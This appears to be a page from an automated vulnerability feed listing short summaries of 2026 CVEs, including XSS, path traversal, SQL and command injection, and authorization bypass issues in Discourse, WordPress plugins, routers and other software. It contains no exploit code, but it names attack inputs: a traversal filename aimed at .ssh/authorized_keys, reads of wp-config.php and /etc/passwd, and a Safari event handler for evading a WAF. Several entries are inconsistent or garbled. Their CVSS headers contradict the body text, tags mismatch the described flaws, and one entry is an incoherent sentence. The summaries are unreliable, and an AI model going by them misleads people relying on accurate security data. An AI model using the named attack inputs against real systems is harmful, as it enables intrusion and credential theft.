A reflected cross-site scripting (XSS) vulnerability exists in XinLiangCoder's php_api_doc application through commit 1ce5bbf, specifically in the list_method.php file where the 'f' GET parameter is output directly to the page without sanitization. Remote attackers can inject arbitrary JavaScript code by crafting malicious URLs, enabling session hijacking, credential theft, and malware distribution within the application context. No CVSS score, EPSS data, or KEV status are currently available, but the vulnerability is confirmed with a proof-of-concept reference available via VulnCheck advisory.

XSS PHP
CVE-2026-32810 MEDIUM CVSS 5.5
Halloy, an IRC application written in Rust, fails to properly restrict file permissions on its configuration directory and files on *nix and macOS systems prior to commit f180e41061db393acf65bc99f5c5e7397586d9cb, resulting in world-readable access to plaintext credentials. Any local user on an affected system can read sensitive authentication data stored in config.toml or referenced password files, leading to credential compromise. While no CVSS score or EPSS data is currently available, the vulnerability represents a direct information disclosure risk with low exploitation complexity.

Information Disclosure Apple macOS
CVE-2026-32733 MEDIUM CVSS 6.5
Halloy, a Rust-based IRC application, contains a path traversal vulnerability in its DCC (Direct Client-to-Client) receive functionality that fails to sanitize filenames from incoming DCC SEND requests prior to commit 0f77b2cfc5f822517a256ea5a4b94bad8bfe38b6. Remote IRC users can exploit this vulnerability to write files outside the configured save directory using path traversal sequences like ../../.ssh/authorized_keys, potentially allowing arbitrary file placement on the victim's system with zero user interaction if auto-accept is enabled. The vulnerability has been patched and is tracked under CWE-22 (Improper Limitation of a Pathname to a Restricted Directory).

Path Traversal
CVE-2026-32697 MEDIUM CVSS 6.5
SuiteCRM versions prior to 8.9.3 contain an access control bypass in the RecordHandler::getRecord() method that allows authenticated users to retrieve any record from the system without proper ACL view permission checks. An attacker with valid credentials can enumerate and read sensitive customer data, financial records, or other confidential information across all modules by directly calling the vulnerable method. The vulnerability has a CVSS score of 6.5 (medium-high) and is information disclosure in nature with no active exploitation reports or public proof-of-concept available at this time.

Authentication Bypass
CVE-2026-32310 MEDIUM CVSS 4.1
Cryptomator versions 1.6.0 through 1.19.0 contain a path traversal vulnerability in vault configuration parsing where the masterkeyfile loader resolves an unverified keyId parameter as a filesystem path before integrity checks are performed. An attacker with the ability to supply a malicious vault configuration can exploit this to trigger arbitrary file existence checks, including UNC paths on Windows that can initiate outbound SMB connections before the user even enters a passphrase, potentially leading to information disclosure about local file structure and network exposure. The vulnerability has been patched in version 1.19.1, and while no active KEV exploitation has been reported, the low attack complexity and the ability to chain this with social engineering (malicious vault sharing) makes it a moderate practical risk.

Hashicorp Microsoft Path Traversal Windows
CVE-2026-32305 MEDIUM CVSS 5.3
Traefik reverse proxy and load balancer contains an mTLS authentication bypass vulnerability that allows attackers to circumvent mutual TLS certificate requirements by sending fragmented TLS ClientHello packets. Affected versions include Traefik 2.11.40 and below, 3.0.0-beta1 through 3.6.10, and 3.7.0-ea.1. When ClientHello messages are fragmented across multiple TLS records, SNI extraction fails with an EOF error, causing the TCP router to fall back to default TLS configuration without client certificate validation, enabling unauthorized access to services that should require mTLS authentication.

Authentication Bypass
CVE-2026-32114 MEDIUM CVSS 4.3
An Insecure Direct Object Reference (IDOR) vulnerability in Discourse allows any authenticated user to access restricted metadata about AI personas, features, and LLM models by directly referencing their identifiers, exposing sensitive information including credit allocations and usage statistics. The vulnerability affects Discourse versions prior to 2026.3.0-latest.1, 2026.2.1, and 2026.1.2, and requires only low-privilege access (any logged-in user account) over the network. While the CVSS score of 5.3 indicates low confidentiality impact with no integrity or availability impact, this represents a clear information disclosure risk that could enable unauthorized tracking of AI resource consumption and usage patterns.

Authentication Bypass
CVE-2026-31926 MEDIUM CVSS 6.5
A web-based mapping platform exposes charging station authentication identifiers publicly, allowing unauthenticated network-based attackers to access sensitive credential information without any user interaction required. The vulnerability affects IGL Technologies eparking.fi application and enables attackers to obtain authentication material that could be leveraged for unauthorized access to charging infrastructure. There is no indication of active exploitation in the wild or public proof-of-concept code, but the vulnerability represents a direct exposure of authentication secrets (CWE-522) with moderate real-world impact.

Information Disclosure
CVE-2026-31869 MEDIUM CVSS 4.3
Discourse prior to versions 2026.3.0-latest.1, 2026.2.1, and 2026.1.2 contains an information disclosure vulnerability in the ComposerController#mentions endpoint that reveals hidden group membership to any authenticated user capable of messaging the group. An attacker can exploit this by supplying hidden-membership group names and probing arbitrary usernames to infer membership based on whether the user_reasons field returns 'private', effectively bypassing group member-visibility controls designed to protect sensitive group information. This vulnerability is not known to be actively exploited in the wild (KEV status unknown), carries a moderate CVSS score of 5.3 reflecting low confidentiality impact with low attack complexity, and requires prior authentication.

Information Disclosure
CVE-2026-31805 MEDIUM CVSS 5.3
A remote code execution vulnerability in Discourse (CVSS 5.3). Remediation should follow standard vulnerability management procedures.

Authentication Bypass
CVE-2026-31382 MEDIUM CVSS 6.1
A Reflected Cross-Site Scripting (XSS) vulnerability exists in the error_description parameter of Gainsight Assist, allowing unauthenticated attackers to inject malicious JavaScript payloads that execute in victims' browsers. The vulnerability is particularly dangerous because attackers can bypass the application's Web Application Firewall (WAF) using Safari-specific event handlers such as onpagereveal, which are not typically filtered by standard XSS protections. While the CVSS score of 6.1 indicates moderate severity with limited direct impact (integrity and availability degradation rather than confidentiality breach), the attack requires minimal technical complexity and no special privileges, making it exploitable by any attacker who can craft a malicious URL and socially engineer a victim into clicking it.

XSS Apple Safari
CVE-2026-31381 MEDIUM CVSS 5.3
Gainsight Assist contains an information disclosure vulnerability where user email addresses (PII) are exposed in base64-encoded format within the OAuth callback URL's state parameter. This affects all versions of Gainsight Assist and allows unauthenticated remote attackers to extract sensitive personal information with no user interaction required. The vulnerability has a CVSS score of 5.3 (moderate) with confirmed disclosure via Rapid7, and patch availability has been documented in vendor advisories.

Information Disclosure
CVE-2026-30891 MEDIUM CVSS 6.5
Discourse versions prior to 2026.3.0-latest.1, 2026.2.1, and 2026.1.2 contain an authorization bypass vulnerability in the user actions endpoint that allows authenticated users to access other users' private activity data. An attacker with valid login credentials can enumerate and view private user actions without proper permission checks, resulting in information disclosure. This is a moderate-severity issue with a CVSS score of 5.3 that requires authentication to exploit but has no known active exploitation or public proof-of-concept at this time.

Information Disclosure
CVE-2026-30889 MEDIUM CVSS 4.9
A moderator authorization bypass vulnerability in Discourse allows authenticated moderators to access post metadata they should not have permission to view due to insufficient authorization checks. The vulnerability affects Discourse versions prior to 2026.3.0-latest.1, 2026.2.1, and 2026.1.2, with patched versions now available. While the CVSS score of 5.3 indicates moderate severity and the attack requires authenticated access with moderator privileges, this represents a meaningful confidentiality risk in multi-tenant forum environments where metadata isolation between moderation scopes is critical.

Authentication Bypass
CVE-2026-30580 MEDIUM CVSS 4.3
File Thingie version 2.5.7 contains a directory traversal vulnerability in its 'create folder from URL' functionality that allows unauthenticated attackers to read arbitrary files from the target system. An attacker can exploit this path traversal flaw by crafting malicious input to the folder creation feature, bypassing directory restrictions and accessing sensitive files outside the intended application directory. Proof-of-concept code is available in public repositories, and while CVSS and EPSS scores are not published, the vulnerability enables direct unauthorized information disclosure.

Path Traversal
CVE-2026-30579 MEDIUM CVSS 6.5
File Thingie version 2.5.7 contains a Stored Cross-Site Scripting (XSS) vulnerability in its file upload functionality where attackers can craft malicious filenames to execute arbitrary JavaScript in users' browsers. An attacker with the ability to upload files to a File Thingie instance can inject JavaScript payloads via filename manipulation, affecting any user who views the uploaded file list or file details. While no CVSS score, EPSS probability, or KEV inclusion status is currently available, proof-of-concept code has been published on GitHub, indicating the vulnerability is publicly disclosed and likely exploitable.

XSS
CVE-2026-30578 MEDIUM CVSS 6.5
File Thinghie version 2.5.7 contains a Reflected Cross-Site Scripting (XSS) vulnerability in the 'dir' GET parameter that allows attackers to execute arbitrary JavaScript code in users' browsers. An attacker can craft a malicious URL containing JavaScript payload in the 'dir' parameter and trick users into clicking it, resulting in session hijacking, credential theft, or malware distribution. While CVSS and EPSS scores are not available, proof-of-concept code exists in public repositories, indicating the vulnerability is well-documented and likely exploitable.

XSS
CVE-2026-29828 MEDIUM CVSS 6.1
DooTask v1.6.27 contains a Stored or Reflected Cross-Site Scripting (XSS) vulnerability in the /manage/project/<id> endpoint via the projectDesc input field, allowing an attacker to inject malicious JavaScript that executes in the context of other users' browsers. An authenticated or unauthenticated attacker can exploit this to steal session cookies, perform actions on behalf of victims, or redirect users to malicious sites. A proof-of-concept has been publicly disclosed on GitHub, increasing the likelihood of active exploitation.

XSS
CVE-2026-29794 MEDIUM CVSS 5.3
Vikunja API fails to properly validate the source IP address for rate-limiting unauthenticated endpoints, allowing attackers to bypass rate limits by spoofing the X-Forwarded-For or X-Real-IP headers. This affects Vikunja API (pkg:go/code.vikunja.io_api) and enables unlimited brute-force attacks against login endpoints and other unauthenticated routes. A functional proof-of-concept has been published demonstrating the bypass mechanism, making this vulnerability readily exploitable without authentication or user interaction.

Docker RCE
CVE-2026-29108 MEDIUM CVSS 6.5
SuiteCRM prior to version 8.9.3 contains an authenticated information disclosure vulnerability in an API endpoint that allows any authenticated user to retrieve sensitive user data including password hashes, usernames, and MFA configurations of other users. This enables attackers with valid credentials to enumerate and potentially crack administrative user passwords, escalating privileges within the CRM system. The vulnerability requires authentication but no additional user interaction, making it a practical attack vector for insider threats or compromised low-privilege accounts.

Information Disclosure
CVE-2026-28204 MEDIUM CVSS 6.5
Authentication identifiers for electric vehicle charging stations are publicly exposed through web-based mapping platforms, allowing unauthenticated network-based access to sensitive authentication data. The vulnerability affects CTEK ChargePortal and enables attackers to obtain charging station credentials without requiring any privileges or user interaction. This information disclosure can lead to unauthorized access to charging infrastructure and potential manipulation of charging sessions.

Information Disclosure
CVE-2026-25792 MEDIUM CVSS 6.5
Greenshot versions 1.3.312 and earlier contain an untrusted executable search path vulnerability (CWE-426) that allows local attackers with high privileges to achieve arbitrary code execution by hijacking the explorer.exe binary launch. When a user double-clicks the Greenshot tray icon to open the screenshot directory, the application launches explorer.exe using a relative path rather than an absolute path, enabling an attacker to plant a malicious executable in a prioritized search location. This vulnerability had no patch available at the time of publication and represents a real privilege escalation and code execution risk requiring immediate user action.

RCE Microsoft Windows
CVE-2026-22902 MEDIUM CVSS 5.7
Arbitrary command execution in QuNetSwitch can be achieved by local attackers with administrator privileges due to insufficient input validation in command processing. This vulnerability affects QuNetSwitch versions prior to 2.0.5.0906, allowing authenticated high-privilege users to bypass security controls and execute system commands. No patch is currently available for affected versions.

Command Injection
CVE-2026-22901 MEDIUM CVSS 6.3
Command injection in QuNetSwitch allows authenticated remote attackers to execute arbitrary commands on affected systems with high impact to confidentiality and integrity. The vulnerability requires valid user credentials to exploit but poses significant risk to systems running versions prior to 2.0.5.0906. No patch is currently available for this CVSS 6.3 medium-severity issue.

Command Injection
CVE-2026-22900 MEDIUM CVSS 6.8
QuNetSwitch contains hard-coded credentials that allow remote attackers to bypass authentication and gain unauthorized access to affected systems. This vulnerability affects QuNetSwitch versions prior to 2.0.5.0906, where credentials are embedded in the application code rather than properly managed through secure credential storage mechanisms. Remote attackers can exploit this weakness without requiring valid user credentials, leading to complete compromise of the network switch management interface.

Authentication Bypass
CVE-2026-22737 MEDIUM CVSS 5.9
Spring Framework applications using Java scripting engines (JRuby, Jython) for template views in Spring MVC or Spring WebFlux can leak sensitive file contents from outside intended directories through path traversal. Affected versions include 7.0.0-7.0.5, 6.2.0-6.2.16, 6.1.0-6.1.25, and 5.3.0-5.3.46, with no patch currently available. An unauthenticated remote attacker can read arbitrary files on the system with confidentiality impact.

Java Path Traversal Redhat
CVE-2026-4507 MEDIUM CVSS 6.3
SQL injection in Mindinventory MindSQL versions up to 0.2.1 allows authenticated remote attackers to execute arbitrary SQL commands through the ask_db function. Public exploit code exists for this vulnerability, and the vendor has not provided a patch or responded to disclosure attempts. Attackers with valid credentials can manipulate database queries to access, modify, or delete sensitive data.

SQLi
CVE-2026-4506 MEDIUM CVSS 6.3
A code injection vulnerability exists in Mindinventory MindSQL up to version 0.2.1 that allows remote code execution through manipulation of the ask_db function in mindsql/core/mindsql_core.py. An authenticated attacker can exploit this vulnerability to execute arbitrary code on the affected system. A public proof-of-concept exploit is available, and the vendor has not responded to early disclosure attempts, increasing the likelihood of active exploitation.

Code Injection RCE
CVE-2026-4505 MEDIUM CVSS 6.3
An unrestricted file upload vulnerability exists in eosphoros-ai DB-GPT versions up to 0.7.5 within the module_plugin.refresh_plugins function of the FastAPI endpoint located at packages/dbgpt-serve/src/dbgpt_serve/agent/hub/controller.py. An authenticated attacker can remotely upload arbitrary files to the system, potentially achieving remote code execution or system compromise. A public proof-of-concept exploit is available on GitHub, and the vendor has not responded to early disclosure attempts, indicating patches may not be forthcoming.

File Upload
CVE-2026-4500 MEDIUM CVSS 6.3
A code injection vulnerability exists in bagofwords (versions up to 0.0.297) within the generate_df function of backend/app/ai/code_execution/code_execution.py, allowing remote attackers with low privileges to inject and execute arbitrary code. The vulnerability (CWE-74: Improper Neutralization of Special Elements in Output) has a CVSS score of 6.3 (Medium) with network-based attack vector and low attack complexity, meaning exploitation requires only basic authentication and no user interaction. A public proof-of-concept exploit is already available, making this a practical threat requiring prompt remediation.

Code Injection
CVE-2026-4499 MEDIUM CVSS 6.9
An OS command injection vulnerability exists in the D-Link DIR-820LW router firmware version 2.03, specifically in the ssdpcgi_main function of the SSDP component. The vulnerability allows remote, unauthenticated attackers to execute arbitrary operating system commands via manipulation of the HTTP_ST environment variable. A proof-of-concept exploit has been publicly disclosed on GitHub, making this an immediate concern for organizations using affected devices.

Command Injection D-Link
CVE-2026-4497 MEDIUM CVSS 6.9
A critical OS command injection vulnerability exists in Totolink WA300 router firmware version 5.2cu.7112_B20190227, specifically in the recvUpgradeNewFw function within /cgi-bin/cstecgi.cgi. An unauthenticated remote attacker can exploit this flaw to execute arbitrary operating system commands on the affected device. A public proof-of-concept exploit has been released on GitHub, significantly lowering the barrier to exploitation and increasing real-world risk.

Command Injection
CVE-2026-4496 MEDIUM CVSS 5.3
Local command injection in sigmade Git-MCP-Server's merge diff functions allows authenticated local attackers to execute arbitrary OS commands through unsanitized input passed to child_process.exec in src/gitUtils.ts. Public exploit code exists for this vulnerability, increasing the risk of active abuse. A patch is available and should be applied immediately, as the vendor has not responded to early disclosure notifications.

Command Injection
CVE-2026-4485 MEDIUM CVSS 6.3
SQL injection in the College Management System 1.0 admin search_student.php endpoint allows authenticated attackers to manipulate the Search parameter and execute arbitrary database queries remotely. Public exploit code exists for this vulnerability, enabling attackers with valid credentials to potentially extract, modify, or delete sensitive student data. The vulnerability affects PHP-based installations and currently lacks an available patch.

PHP SQLi
CVE-2026-4476 MEDIUM CVSS 6.3
The YI Home Camera 2 (version 2.1.1_20171024151200) CGI endpoint fails to properly authenticate requests to the /home/web/ipc function, allowing unauthenticated attackers on the local network to manipulate camera settings and access sensitive functionality. Public exploit code exists for this vulnerability, and the vendor has not provided a patch despite early notification. An attacker with network access to the camera could read configuration data, modify settings, or disrupt normal operations.

Authentication Bypass
CVE-2026-4473 MEDIUM CVSS 4.7
SQL injection in itsourcecode Online Doctor Appointment System 1.0 allows remote attackers with high privileges to manipulate the appointment_id parameter in /admin/appointment_action.php, potentially compromising data confidentiality and integrity. Public exploit code exists for this vulnerability, though no patch is currently available for PHP-based deployments.

PHP SQLi
CVE-2026-4472 MEDIUM CVSS 6.3
SQL injection in itsourcecode Online Frozen Foods Ordering System 1.0 allows authenticated remote attackers to manipulate the Supplier_Name parameter in /admin/admin_edit_supplier.php, potentially enabling data exfiltration or modification. Public exploit code exists for this vulnerability, and no patch is currently available.

SQLi PHP
CVE-2026-4471 MEDIUM CVSS 4.7
SQL injection in itsourcecode Online Frozen Foods Ordering System 1.0 allows authenticated administrators to manipulate the First_Name parameter in /admin/admin_edit_employee.php, enabling remote database compromise. Public exploit code exists for this vulnerability, which requires high-level privileges but carries low complexity for exploitation. The affected system currently lacks an available patch.

PHP SQLi
CVE-2026-4470 MEDIUM CVSS 4.7
SQL injection in itsourcecode Online Frozen Foods Ordering System 1.0 allows remote attackers with high privileges to manipulate the product_name parameter in /admin/admin_edit_menu.php, enabling unauthorized data access and modification. Public exploit code exists for this vulnerability, increasing the risk of active exploitation. The affected PHP application currently lacks an available patch.

PHP SQLi
CVE-2026-4469 MEDIUM CVSS 4.7
SQL injection in itsourcecode Online Frozen Foods Ordering System 1.0 allows remote attackers with high-level privileges to manipulate the product_name parameter in /admin/admin_edit_menu_action.php, potentially exposing or modifying sensitive database information. Public exploit code for this vulnerability exists, though no patch is currently available.

PHP SQLi
CVE-2026-4468 MEDIUM CVSS 4.7
Command injection in Comfast CF-AC100 2.6.0.8 allows remote attackers to execute arbitrary commands through the /cgi-bin/mbox-config endpoint with high privileges. The vulnerability requires administrative credentials but carries no authentication complexity, and public exploit code exists with no vendor patch available. Affected devices can be compromised remotely to achieve command execution with limited scope.

Command Injection
CVE-2026-4467 MEDIUM CVSS 4.7
Command injection in Comfast CF-AC100 2.6.0.8 wireless configuration endpoint allows unauthenticated remote attackers to execute arbitrary commands with elevated privileges through the /cgi-bin/mbox-config interface. Public exploit code exists for this vulnerability, and the vendor has not released a patch despite early notification. The attack requires network access but no user interaction, making it readily exploitable in exposed deployments.

Command Injection
CVE-2026-4466 MEDIUM CVSS 4.7
Command injection in Comfast CF-AC100 2.6.0.8 allows authenticated remote attackers to execute arbitrary commands via the /cgi-bin/mbox-config endpoint's ntp_timezone parameter. Public exploit code exists for this vulnerability, and the vendor has not provided a patch or response to disclosure notifications. An attacker with high-level privileges can leverage this to compromise device integrity and confidentiality.

Command Injection
CVE-2026-4465 MEDIUM CVSS 5.3
OS command injection in D-Link DIR-513 1.10 via the /goform/formSysCmd endpoint allows authenticated remote attackers to execute arbitrary commands with network access. The vulnerability stems from insufficient input validation of the sysCmd parameter and has public exploit code available. No patch is available, and affected devices are no longer supported by D-Link.

D-Link Command Injection
CVE-2026-4453 MEDIUM CVSS 4.3
Cross-origin data leakage in Google Chrome's Dawn component on macOS versions prior to 146.0.7680.153 results from an integer overflow vulnerability that can be triggered through a malicious HTML page. An unauthenticated attacker can exploit this to access sensitive information from other origins without user interaction beyond viewing the crafted page. Patches are available for Chrome, Ubuntu, and Debian.

Google Information Disclosure Ubuntu Debian Chrome
CVE-2026-4438 MEDIUM CVSS 5.4
The GNU C Library (glibc) versions 2.34 through 2.43 contain a vulnerability in the gethostbyaddr and gethostbyaddr_r functions that can return invalid DNS hostnames violating DNS specification requirements when using a configured nsswitch.conf with the DNS backend. This affects any application or system service relying on reverse DNS lookups through glibc, potentially leading to information disclosure or incorrect hostname resolution. While no CVSS score, EPSS probability, or active exploitation status has been publicly assigned, the vulnerability represents a data integrity issue in a foundational system library affecting millions of Linux systems.

Information Disclosure
CVE-2026-4136 MEDIUM CVSS 4.3
The Membership Plugin - Restrict Content for WordPress contains an unvalidated redirect vulnerability in the 'rcp_redirect' parameter that allows unauthenticated attackers to redirect users to arbitrary external sites via password reset emails. Affected versions include all releases up to and including 3.2.24. This vulnerability has a CVSS score of 4.3 (low-to-moderate severity) and requires user interaction, limiting its immediate exploitation impact but creating a viable phishing vector for credential harvesting or malware distribution.

WordPress Information Disclosure
CVE-2026-4083 MEDIUM CVSS 6.4
This is a Stored Cross-Site Scripting (XSS) vulnerability in the Scoreboard for HTML5 Games Lite WordPress plugin affecting all versions up to and including 1.2. The vulnerability exists in the sfhg_shortcode() function, which insufficiently validates HTML attributes added to iframe elements, allowing authenticated attackers with Contributor-level access or above to inject arbitrary JavaScript that executes when users view affected pages. The vulnerability has a CVSS score of 6.4 with medium real-world risk, as it requires authenticated access but affects stored content with site-wide impact.

WordPress XSS
CVE-2026-3864 MEDIUM CVSS 6.5
The Kubernetes NFS CSI Driver fails to properly validate the subDir parameter in volume identifiers, allowing privileged users to inject path traversal sequences that bypass intended directory restrictions. Attackers with PersistentVolume creation privileges can craft malicious volume identifiers to access and modify arbitrary directories on the NFS server during cleanup operations. No patch is currently available for this medium-severity vulnerability affecting Kubernetes environments.

Kubernetes Path Traversal
CVE-2026-3577 MEDIUM CVSS 4.4
The Keep Backup Daily WordPress plugin versions up to 2.1.2 contain a Stored Cross-Site Scripting (XSS) vulnerability in the backup title alias functionality due to insufficient input sanitization and output escaping. Authenticated administrators can inject arbitrary JavaScript via the `val` parameter in the `update_kbd_bkup_alias` AJAX action, which executes when other administrators view the backup list page. With a CVSS score of 4.4 and moderate real-world risk due to high privilege requirements, this vulnerability requires administrator-level access to exploit but can compromise other administrator sessions.

WordPress XSS
CVE-2026-3572 MEDIUM CVSS 6.1
The iTracker360 WordPress plugin (versions up to 2.2.0) contains a combined Cross-Site Request Forgery (CSRF) and Stored Cross-Site Scripting (XSS) vulnerability in its settings form submission handler. An unauthenticated attacker can craft a malicious link or webpage that, when clicked by an administrator, injects arbitrary JavaScript code into the plugin's stored settings due to missing nonce verification and insufficient input sanitization/output escaping. This vulnerability is classified as medium severity (CVSS 6.1) and poses a real risk to WordPress sites using this plugin, as exploitation requires only user interaction and network access with no special privileges.

WordPress XSS CSRF
CVE-2026-3567 MEDIUM CVSS 5.3
A security vulnerability in for WordPress is vulnerable to unauthorized access in all (CVSS 5.3) that allows any authenticated user. Remediation should follow standard vulnerability management procedures.

WordPress Authentication Bypass
CVE-2026-3550 MEDIUM CVSS 5.3
The RockPress WordPress plugin (versions up to 1.0.17) contains a Missing Authorization vulnerability in five AJAX actions that allows authenticated users with Subscriber-level privileges to trigger privileged operations intended for administrators. The vulnerability stems from a combination of missing capability checks (current_user_can() calls) in AJAX handlers and exposure of an admin nonce to all authenticated users via an unconditionally enqueued script. Attackers can extract the nonce from the HTML source and use it to trigger resource-intensive imports, reset import data, check service connectivity, and read import status information without administrative privileges.

WordPress PHP Authentication Bypass
CVE-2026-3516 MEDIUM CVSS 6.4
A Stored Cross-Site Scripting (XSS) vulnerability exists in the Contact List plugin for WordPress (versions up to 3.0.18) where the '_cl_map_iframe' parameter fails to properly sanitize and escape Google Maps iframe custom fields, allowing authenticated attackers with Contributor-level access or higher to inject arbitrary JavaScript that executes in the browsers of users viewing affected pages. The vulnerability stems from insufficient input validation in the saveCustomFields() function and missing output escaping in the front-end rendering, creating a persistent XSS condition with a CVSS score of 6.4 and low-to-moderate exploitation probability given the authentication requirement.

WordPress PHP XSS Google
CVE-2026-3474 MEDIUM CVSS 4.9
The EmailKit - Email Customizer for WooCommerce & WP WordPress plugin contains a path traversal vulnerability in the TemplateData class that allows authenticated administrators to read arbitrary files from the server via the 'emailkit-editor-template' REST API parameter. An attacker with Administrator privileges can exploit this flaw to access sensitive files such as wp-config.php or /etc/passwd by supplying directory traversal sequences, with the retrieved file contents stored as post metadata and retrievable through the fetch-data REST API endpoint. The vulnerability affects all versions up to and including 1.6.3, and while it requires high-level administrative access and has a moderate CVSS score of 4.9, it represents a critical information disclosure risk in multi-user WordPress environments.

WordPress PHP Path Traversal
CVE-2026-3350 MEDIUM CVSS 6.4
A Stored Cross-Site Scripting (XSS) vulnerability exists in the Image Alt Text Manager plugin for WordPress (all versions up to 1.8.2) due to insufficient input sanitization and output escaping when dynamically generating image alt and title attributes via DOM parser. Authenticated attackers with Author-level access or higher can inject arbitrary JavaScript through post titles, which executes when other users visit affected pages. With a CVSS score of 6.4 and confirmed reporting by Wordfence, this vulnerability affects SEO-focused WordPress installations relying on this plugin for bulk alt text management.

WordPress XSS
CVE-2026-2432 MEDIUM CVSS 4.4
CM Custom Reports - Flexible reporting to track what matters most plugin for WordPress contains a Stored Cross-Site Scripting (XSS) vulnerability in admin settings that allows authenticated administrators to inject arbitrary web scripts. The vulnerability affects all versions up to and including 1.2.7 and is caused by insufficient input sanitization and output escaping in the GraphModule.php file. While the CVSS score of 4.4 is moderate, exploitation is restricted to high-privilege authenticated attackers on multi-site WordPress installations or where unfiltered_html has been disabled, making real-world exploitability dependent on specific WordPress configurations.

WordPress XSS
CVE-2026-2430 MEDIUM CVSS 6.4
The Autoptimize WordPress plugin contains a Stored Cross-Site Scripting (XSS) vulnerability in the lazy-loading image processing function that allows authenticated attackers with Contributor-level access to inject arbitrary web scripts into pages. The flaw exists in all versions up to and including 3.1.14 and stems from an overly permissive regular expression that fails to properly validate image tag attributes, enabling attackers to craft malicious image tags that break HTML structure and promote attribute values into executable code. This vulnerability carries a moderate CVSS score of 6.4 and requires user interaction for stored XSS payloads to execute when pages are accessed.

WordPress XSS
CVE-2026-2421 MEDIUM CVSS 6.5
A Path Traversal vulnerability exists in the ilGhera Carta Docente for WooCommerce plugin for WordPress (versions up to and including 1.5.0) that allows authenticated administrators to delete arbitrary files on the server through insufficient validation of the 'cert' parameter in the 'wccd-delete-certificate' AJAX action. An attacker with administrator privileges can exploit this to delete critical files such as wp-config.php, leading to site takeover and potential remote code execution. The vulnerability has been documented by Wordfence security researchers and affects all versions from release through 1.5.0, with a patch available in version 1.5.1 and later.

WordPress PHP Path Traversal RCE
CVE-2026-2352 MEDIUM CVSS 6.4
A Stored Cross-Site Scripting (XSS) vulnerability exists in the Autoptimize WordPress plugin through version 3.1.14, caused by insufficient input sanitization in the ao_metabox_save() function and missing output escaping when rendering the 'ao_post_preload' meta value into HTML link tags. Authenticated attackers with Contributor-level access or higher can inject arbitrary JavaScript that executes whenever users access pages with the Image optimization or Lazy-load images settings enabled, potentially affecting all users of compromised sites. The vulnerability has been patched and proof-of-concept code is available in the referenced GitHub commit.

WordPress PHP XSS
CVE-2025-63260 MEDIUM CVSS 5.4
SyncFusion versions up to 30.1.37 contain stored Cross-Site Scripting (XSS) vulnerabilities in two distinct UI components: the Document-Editor reply-to-comment field and the Chat-UI chat message field. An attacker can inject malicious JavaScript payloads through these fields, which are then stored and executed in the browsers of other users who view the affected content, potentially enabling session hijacking, credential theft, or malware distribution. No CVSS score, EPSS data, or KEV status is currently available, but proof-of-concept exploitation details are documented in the pentest-tools reference (PTT-2025-023-Multiple-Stored-XSS.pdf).

XSS
CVE-2025-62845 MEDIUM CVSS 5.6
An improper neutralization of escape, meta, or control sequences vulnerability (CWE-150) affects QNAP QHora/QuRouter devices, allowing local attackers with administrator privileges to cause unexpected behavior through injection of unfiltered control sequences. The vulnerability has been patched in QuRouter version 2.6.3.009 and later. While no CVSS score, EPSS probability, or KEV/POC data are currently published, the requirement for local administrator access significantly limits exploitation scope in typical deployments.

Privilege Escalation Qurouter
CVE-2025-62844 MEDIUM CVSS 4.0
A weak authentication vulnerability exists in QNAP QHora/QuRouter devices that allows attackers with local network access to bypass authentication mechanisms and disclose sensitive information. The vulnerability affects QuRouter versions prior to 2.6.2.007, and exploitation requires network-level access but no special privileges. While no CVSS score or EPSS data is publicly available, the classification as CWE-1390 (Weak Authentication) and the emphasis on local network access indicates this is a network-adjacent threat with moderate real-world risk, particularly in environments where untrusted devices can connect to the local network.

Information Disclosure Qurouter
CVE-2025-46598 MEDIUM CVSS 5.3
Bitcoin Core versions through 29.0 contain a denial of service vulnerability that can be triggered by a specially crafted transaction. An attacker with network access can send a malicious transaction to cause the affected Bitcoin Core node to become unresponsive or crash, disrupting normal operation of the node. No CVSS score, EPSS data, or active exploitation in the wild has been disclosed, but the vulnerability has been formally disclosed by the Bitcoin Core project.

Denial Of Service
CVE-2024-31119 MEDIUM CVSS 5.9
Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Vasilis Triantafyllou Special Box for Content allows DOM-Based XSS. Rated medium severity (CVSS 5.9), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

XSS
CVE-2026-33490 LOW CVSS 3.7
The h3 web framework contains a path-matching vulnerability in its mount() method that fails to enforce path segment boundaries when checking if requests fall under a mounted sub-application's prefix. This allows attackers to trigger middleware intended for a path like /admin on unrelated routes such as /admin-public or /administrator, potentially polluting request context with unintended privilege flags and leading to authorization bypass. A proof-of-concept is available demonstrating context pollution across mount boundaries, and the vulnerability affects all h3 v2 applications using mount() with prefix-vulnerable path configurations.

Information Disclosure
CVE-2026-33426 LOW CVSS 3.5
Discourse versions prior to 2026.3.0-latest.1, 2026.2.1, and 2026.1.2 contain an authorization bypass vulnerability where users with tag-editing permissions can edit and create tag synonyms for tags within restricted tag groups, even when those users lack visibility into the restricted tags themselves. This represents a broken access control issue (CWE-862) with low CVSS score (3.5) due to high privilege requirement and limited impact scope, though it enables unauthorized information disclosure and tag manipulation within the platform. No public exploit code or active exploitation in the wild has been reported at this time.

Authentication Bypass
CVE-2026-33423 LOW CVSS 1.3
A privilege escalation vulnerability in Discourse allows staff members to arbitrarily modify group notification levels for any user without proper authorization checks. This affects Discourse versions prior to 2026.3.0-latest.1, 2026.2.1, and 2026.1.2, enabling authenticated staff users to alter notification settings for other users in ways they should not be permitted to do. While no CVSS score or EPSS data is available and no known public exploits have been confirmed, the vulnerability is classified under CWE-862 (Missing Authorization) and has been assigned a GitHub Security Advisory (GHSA-qggq-wr6h-vhrg) with patches available.

Authentication Bypass
CVE-2026-33422 LOW CVSS 3.5
Discourse versions prior to 2026.3.0-latest.1, 2026.2.1, and 2026.1.2 contain an information disclosure vulnerability where IP addresses of flagged users are exposed to any user with access to the review queue, including those without proper authorization. This allows unauthorized access to sensitive network information that should be restricted to administrators. The vulnerability has a CVSS score of 3.5 (low severity) with no known public exploits or KEV designation, but represents a clear privacy and data protection issue in moderation workflows.

Information Disclosure
CVE-2026-33070 LOW CVSS 3.7
FileRise, a self-hosted web file manager and WebDAV server, contains a missing-authentication vulnerability in the deleteShareLink endpoint that allows unauthenticated attackers to delete arbitrary file share links by providing only the share token, resulting in denial of service to legitimate users accessing shared files. All versions prior to 3.8.0 are affected. While the CVSS score is moderate at 3.7 due to high attack complexity, the vulnerability has a published proof-of-concept via the GitHub security advisory and represents a trivial attack surface requiring only knowledge of a share token.

PHP Denial Of Service CSRF Authentication Bypass
CVE-2026-32828 LOW CVSS 2.0
